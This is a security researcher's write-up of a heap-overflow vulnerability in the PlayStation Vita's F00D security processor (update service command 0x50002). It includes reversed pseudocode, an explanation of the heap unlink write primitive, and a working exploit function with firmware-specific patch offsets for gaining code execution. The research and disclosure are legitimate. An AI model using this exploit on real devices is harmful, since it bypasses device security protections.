_This article was originally written 2019-01-11 and published on 2019-07-29 for the third anniversary of HENkaku, the first Vita jailbreak. It documents the work we did in early 2017, just days after the seminal “octopus” exploit. Although the work is dated and does not open any new doors, the technical contents might be interesting for a particular audience. The original intention was to post this after someone else independently discovers the same vulnerability. There were many overt hints on the HENkaku wiki that the `0x50002` service was buggy but I underestimated the interest (or skills) that people would have in hacking an exotic processor that ultimately does nothing for people who just want to run homebrews or play pirated games._
The PlayStation Vita carries a custom designed chip with a security processor running an exotic instruction set (Toshiba MeP). We name this processor F00D and [talked about it at length](http://teammolecule.github.io/35c3-slides/) about how we dumped it. However, dumping the private memory isn’t enough. We want code execution and to do that we need to find a memory corruption vulnerability. Thanks to the dumps we got from the [octopus exploit](https://teammolecule.github.io/35c3-slides/#octopus-pre) and the analysis from the [IDA plugin](https://github.com/TeamMolecule/toshiba-mep-idp) we have all the tools we need to dig deep into the code and look for bugs.
## A buggy service
Long before octopus, we found a bug in command `0x50002` in `update_service_sm.self`. The details of this command are not important, but essentially it performs the per-console encryption of the boot loaders before it is flashed by the updater. To do this, the command takes in a list of memory ranges corresponding to the buffer to encrypt (for the keen minded, this is the same list format as the one discussed in the octopus exploit and is done because F00D does not support virtual memory addressing natively). The bug allowed us to point to pointers in F00D private memory but does not allow us to do anything directly. In order words, we have second level pointers where the second level can be in F00D private memory but not the first level. Unfortunately, we went nowhere with this bug as it seemed difficult to exploit. But it did give us hope seeing that there were missing security checks inside F00D.
After we dumped F00D with octopus, the first thing we decrypted was `update_service_sm.self` and we took a closer look at `0x50002`.
## Bigmac batch operations
Before going into the details of the vulnerability, it is important to know how F00D does crypto operations. F00D contains a dedicated crypto hardware accelerator we call “bigmac.” Davee talks about it [in his post on a hardware bug found in bigmac](https://www.lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/). One of the ways of using bigmac is a batch operation where a linked list of operations is passed in. The format of this linked list is as follows:
```
typedef struct bigmac_op {
void *src_addr;
void *dst_addr;
uint32_t length;
uint32_t operation; // ex: 0x2000
uint32_t keyslot; // ex: 0x8
uint32_t iv; // ex: 0x812d40
uint32_t field_18; // ex: 0x0
struct bigmac_op *next;
} __attribute__((packed)) bigmac_op_t;
```
The fields are self explanatory and all pointers are physical addresses (F00D does not support virtual memory). It is acceptable for `src_addr` and `dst_addr` to be the same.
## Command 0x50002
Command `0x50002` is used by the updater to encrypt the bootloaders with a console-unique key. This is to protect certain types of downgrade attacks where the attacker can write to the eMMC as well as [Syscon](https://wiki.henkaku.xyz/vita/Syscon) but NOT execute arbitrary ARM kernel code. It seems like a contrived attack and it probably is, but Sony’s strategy always seems to be “add crypto first, think later.” However the point of this command isn’t particularly relevant to us. We just care about its operation.
The command takes in a list (maximum number of entries: 0x1F1) of address+length pairs and can operate in two modes. In LV2 mode, the list is interpreted as second level pointers. Each list entry points to a region of LV1 entries (address+length pairs). Each LV1 entry points to a region of memory of arbitrary size that is to be encrypted. In LV1 mode, the list are LV1 entries directly. The reason for having LV2 mode is that Sony does not want to limit themselves to `0x1F1` maximum regions to encrypt in one operation. Let’s take a look at what the command input buffer looks like.
```
typedef struct {
void *addr;
uint32_t length;
} __attribute__((packed)) region_t;
typedef struct {
uint32_t unused_0[2];
uint64_t use_lv2_mode; // if 1, use lv2 list
uint32_t unused_10[3];
uint32_t list_count; // must be < 0x1F1
uint32_t unused_20[4];
uint32_t total_count; // only used in LV1 mode
uint32_t unused_34[1];
union {
region_t lv1[0x1F1];
region_t lv2[0x1F1];
} list;
} __attribute__((packed)) cmd_0x50002_t;
```
In LV2 mode, we set `use_lv2_mode = 1` and `list_count` to be the total number of LV2 entries (max 0x1F1). Then each `list.lv2` entry will point to an array of `region_t` representing LV1 entries. `total_count` is unused.
In LV1 mode, we set `use_lv2_mode = 0` and `list_count` to be the total number of LV1 entries (max 0x1F1). Then each `list.lv1` entry will point to a region to encrypt. `total_count` is set to the total number of LV1 entries (max 0x1F1).
Wait what?
Did you notice something weird here? If you said “why is the total number of LV1 entries stored twice” then congratulations, you found the first bug. But we’re getting ahead of ourselves. Let’s see how this command works. There are three parts to it. First, the input arguments are parsed and validated. Next, a heap buffer is allocated to convert the the LV1 entries to bigmac AES-128-CBC operations. Finally, bigmac is invoked in batch mode to encrypt all the regions in the LV1 entries. Here is the pseudocode for the first part:
```
int get_entries(cmd_0x50002_t *args, uint32_t *p_size) {
if (args->list_count >= 0x1F1) {
return 0x800F0216;
}
if (args->use_lv2_mode == 1) {
*p_size = 0;
for (uint32_t i = 0; i < args->list_count; i++) {
*p_size += (args->list.lv2[i].length) / sizeof(region_t);
// NOTE: p_size wraparound is NOT checked but this exploit path is harder
}
} else {
*p_size = args->total_count;
}
return 0;
}
int handle_0x50002(cmd_0x50002_t *args) {
int ret;
uint32_t entries;
char *buf, buf_aligned;
bigmac_op_t *batch;
if ((ret = get_entries(args, &entries)) != 0) {
return ret;
}
// sizeof(bigmac_op_t) == 32
if ((buf = malloc((entries * sizeof(bigmac_op_t)) + 31)) == NULL) {
return 0x800F020C;
}
// NOTE: the size argument of malloc can also wraparound
buf_aligned = (buf + 31) & ~31;
batch = (bigmac_op_t *)buf_aligned;
if ((ret = create_batch(args, g_iv, batch, entries)) != 0) {
goto done;
}
if ((ret = run_bigmac_batch(batch, entries)) != 0) {
goto done;
}
done:
free(buf);
return ret;
}
```
So already we have two bugs. In `get_entries`, in LV2 mode, `*p_size` can wraparound and in `handle_0x50002` the `malloc`’s argument can also wraparound. We spent a day trying to exploit this but turns out there is a much easier path. Let’s look at the second part, `create_batch`:
```
int init_bigmac_batch(bigmac_op_t *batch, uint32_t entries, int mask, int keyslot, const void *iv) {
if (entries == 0 || (batch & 31) != 0) {
return 0x800F0016;
}
for (uint32_t i = 0; i < entries; i++) {
batch[i].operation = mask;
batch[i].keyslot = keyslot;
batch[i].iv = iv;
batch[i].field_18 = 0;
batch[i].next = &batch[i+1];
}
batch[entries-1].next = 0xFFFFFFFF; // indicate end
return 0;
}
int create_batch(cmd_0x50002_t *args, const void *iv, bigmac_op_t *batch, uint32_t entries) {
int ret;
if (args == NULL || batch == NULL || entries == 0) {
return 0x800F0216;
}
if ((ret = init_bigmac_batch(batch, entries, 0x2000, 0x8, iv)) != 0) {
return ret;
}
if (args->list_count >= 0x1F1) {
return 0x800F0216;
}
if (args->use_lv2_mode == 1) {
uint32_t k = 0;
for (uint32_t i = 0; i < args->list_count; i++) {
region_t *lv1 = (region_t *)args->list.lv2[i].addr;
// Sidenote: `lv1` not being checked in the whitelist is the first bug we
// found as described in the introduction. We were not able to exploit this.
for (uint32_t j = 0; j < args->list.lv2[i].length / sizeof(region_t); j++) {
batch[k].src_addr = lv1[i].addr;
batch[k].dst_addr = lv1[i].addr;
batch[k].length = lv1[i].length;
k++;
if (!is_region_whitelisted(lv1[i])) {
return 0x800F0216;
}
}
}
} else { // LV1 only mode
for (uint32_t i = 0; i < args->list_count; i++) { // WHAT ABOUT args->total_count?
batch[i].src_addr = args->list.lv1[i].addr;
batch[i].dst_addr = args->list.lv1[i].addr;
batch[i].length = args->list.lv1[i].length;
if (!is_region_whitelisted(args->list.lv1[i])) {
// Note: We actually will fail the whitelist check when exploiting the
// heap overflow. However, that is fine as batch[i] is written BEFORE
// the whitelist check and `free` is always called.
return 0x800F0216;
}
}
}
return 0;
}
```
The easier path as hinted earlier is that `args->total_count` is never used in `create_batch`. Let’s look back at what this means. In `handle_0x50002`, we `malloc` a buffer of size `entries * sizeof(bigmac_op_t)) + 31`. `entries` is returned from `get_entries`, which in LV1 mode is just `args->total_count`. However, in `create_batch`, we use `args->list_count` as the iterator to write to each entry. That means as long as `args->list_count > args->total_count`, we have a heap overflow! Now let’s look at how we exploit this.
## F00D heap
The update service uses a very simple heap structure. Each heap block contains a 24-byte header and is part of a doubly-linked list. There is no fancy allocation algorithm. There are only two global lists: used and free. Blocks are broken up on malloc and coalesced on free (if there are adjacent free blocks). Blocks are moved from one list to another for malloc and free and are always sorted in order of address. This is what the header looks like:
```
typedef struct heap_hdr {
void *data; // point to after `next`
uint32_t size;
uint32_t size_aligned;
uint32_t padding;
struct heap_hdr *prev;
struct heap_hdr *next;
} __attribute__((packed)) heap_hdr_t;
```
When the applet is first started, a `0x4000` byte buffer is set aside to be used for the heap. Both the used and free list are empty.
![Memory layout](https://yifan.lu/images/2019/01/heap-1.svg)
Let’s say we make a `0x50002` command call in LV1 only mode and `args->total_count = 2`. That will result in a `malloc(2*32+31)`. Since the empty list is free, we get a large chunk from the initial buffer.
![Block allocation](https://yifan.lu/images/2019/01/heap-2.svg)
Now we break that chunk into two pieces: the block the heap allocator returns and a free block that is added to the free list. A 24-byte header is added to both blocks in order to keep track of block metadata.
![Heap allocation](https://yifan.lu/images/2019/01/heap-3.svg)
We zoom into these blocks to see how they are laid out. Notice that we have enough space for two `bigmac_op_t` as well as some extra space reserved by the alignment.
![Heap block before overflow](https://yifan.lu/images/2019/01/heap-4.svg)
Now let’s assume we set `args->list_count = 4` to trigger a heap overflow. Since `args->total_count = 2`, we will begin to overwrite some of that extra padding and eventually hit the adjacent free block and start to overwrite the block header. Again, this is because `create_batch` uses `args->list_count` when writing to the buffer while `handle_0x50002` uses `args->total_count` to allocate the buffer.
![Heap block after overflow](https://yifan.lu/images/2019/01/heap-5.svg)
In the diagram above, the dotted outlines represents the two extra blocks `create_batch` writes. The third block is not too interesting because it mainly overwrites the padding space and some of the free block metadata. The fourth overflow block is the one we’ll use to exploit the applet. Notice how `batch[3].length` overwrites the `prev` pointer and `batch[3].operation` overwrites the `next` pointer. We fully control `batch[3].length` because it comes from `args->list.lv1[3].length` and we partially control `batch[3].operation` because it is always set to `0x2000`.
Now that we control these two pointers, let’s shift our focus to `free` which will attempt to coalesce these two blocks after freeing the used block because they will be adjacent free blocks. There is code that is similar to the following:
```
void free(void *buf) {
...
heap_hdr_t *cur, *adjacent;
cur = (heap_hdr_t *)cur;
adjacent = (heap_hdr_t *)(buf + cur->size_aligned);
// remove from used list
list_unlink(g_heap_used, cur);
if (is_in_list(g_heap_free, adjacent)) {
// remove adjacent from list
adjacent->prev->next = adjacent->next;
adjacent->next->prev = adjacent->prev;
// coalesce
cur->aligned_size += adjacent->aligned_size + sizeof(heap_hdr_t);
cur->size = cur->aligned_size;
// add to free list
list_link(g_heap_free, cur);
}
...
}
```
If we focus on the line `adjacent->prev->next = adjacent->next` we can see that this is equivalent to `*(uint32_t *)batch[3].size = batch[3].operation` due to the heap overflow. As explained above, we control both of these fields so in effect, it becomes `*(uint32_t *)args->list.lv1[3].length = 0x2000`.
At this point, it should be noted that Toshiba MeP processors have two features (or lack of) that makes our lives much easier. First, an invalid memory access will be ignored. This means when we execute the next line `adjacent->next->prev = adjacent->prev` and notice that `adjacent->next->prev` is an invalid pointer, we are still fine. Second, there is no memory protection, so we can write directly into executable memory without issue. With that in mind, we can get code execution like we are living in 1990.
## Exploiting
Using the heap overflow, we can develop a primitive to corrupt arbitrary F00D memory from ARM by writing `0x2000` to it.
```
int corrupt(int ctx, uint32_t addr) {
int ret = 0, sm_ret = 0;
cmd_0x50002_t args = {0};
// construct the arguments
args.use_lv2_mode = 0;
args.list_count = 3;
args.total_count = 1;
// we used 4 blocks in the example to illustrate how things work
// but actually 3 blocks is enough to trigger the vulnerability
// first two valid entries to pass whitelist checks
// we make them arbitrary valid values
args.list.lv1[0].addr = 0x50000000;
args.list.lv1[0].length = 0x10;
args.list.lv1[1].addr = 0x50000000;
args.list.lv1[1].length = 0x10;
// here is our overflow entry, which fails checks but does not matter
// because the free block header is overwritten and free is called
// even when there is an error since this is the last entry
args.list.lv1[2].addr = 0;
args.list.lv1[2].length = addr - offsetof(heap_hdr_t, next);
ret = sceSblSmCommCallFunc(ctx, 0x50002, &sm_ret, &args, sizeof(args));
if (sm_ret < 0) {
return sm_ret;
}
return ret;
}
```
`0x2000` in MeP assembly becomes `bsetm ($0),0x0` which does bit-setting. However, that is not important because we can effectively treat it as a NOP and replace arbitrary instructions with this one to bypass checks. Next, we “wrote” our own memcpy by taking an existing command handler in the applet and nopping out instructions until it acted like a memcpy.
```
// offsets for 1.692, overwrites cmd 0x60002
corrupt(ctx, 0x0080B904);
corrupt(ctx, 0x0080B938);
corrupt(ctx, 0x0080B948);
corrupt(ctx, 0x0080B94C);
corrupt(ctx, 0x0080B950);
corrupt(ctx, 0x0080B958);
corrupt(ctx, 0x0080B95C);
corrupt(ctx, 0x0080B914);
corrupt(ctx, 0x0080B918);
```
Finally, we need to trigger an icache flush by calling some random command (making it fetch new instructions and evict old cache entries). Then we can `memcpy` our F00D code in and run it! Overall this was a simple vulnerability and there were no exploit mitigation in place. However, it would have been much more difficult to find this vulnerability and exploit it blind. Most of the security in F00D comes from the fact that it has a small attack surface as well as the fact that the interface and software are all proprietary. Once you look at the code though, attacking it becomes a lot less intimidating.